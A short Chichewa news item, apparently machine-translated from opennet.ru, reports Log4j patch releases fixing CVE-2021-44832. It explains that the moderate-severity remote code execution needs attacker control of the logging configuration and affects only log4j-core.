Zowongolera zowongolera laibulale ya Log4j 2.17.1, 2.3.2-rc1 ndi 2.12.4-rc1 zasindikizidwa, zomwe zimakonza chiwopsezo china (CVE-2021-44832). Zimanenedwa kuti vutoli limalola kuphedwa kwa ma code akutali (RCE), koma amalembedwa kuti ndi abwino (CVSS Score 6.6) ndipo makamaka ndi chidwi chongoganizira chabe, chifukwa pamafunika mikhalidwe yapadera yogwiritsiridwa ntchito - wowukirayo ayenera kusintha fayilo ya zoikamo Log4j, i.e. ayenera kukhala ndi mwayi wopita ku dongosolo lowukiridwa ndi ulamuliro wosintha mtengo wa log4j2.configurationFile configuration parameter kapena kupanga kusintha kwa mafayilo omwe alipo ndi zoikamo zodula mitengo.
Kuwukiraku kumafikira pakutanthauzira kukhazikitsidwa kwa JDBC Appender pamakina akomweko komwe kumatanthawuza JNDI URI yakunja, ikafunsidwa kuti gulu la Java libwezedwe kuti liphedwe. Mwachikhazikitso, JDBC Appender sinakonzedwe kuti igwire ma protocol omwe si a Java, mwachitsanzo. Popanda kusintha kasinthidwe, kuukira sikutheka. Kuphatikiza apo, nkhaniyi imangokhudza log4j-core JAR ndipo sizikhudza mapulogalamu omwe amagwiritsa ntchito log4j-api JAR popanda log4j-core. ...
Source: opennet.ru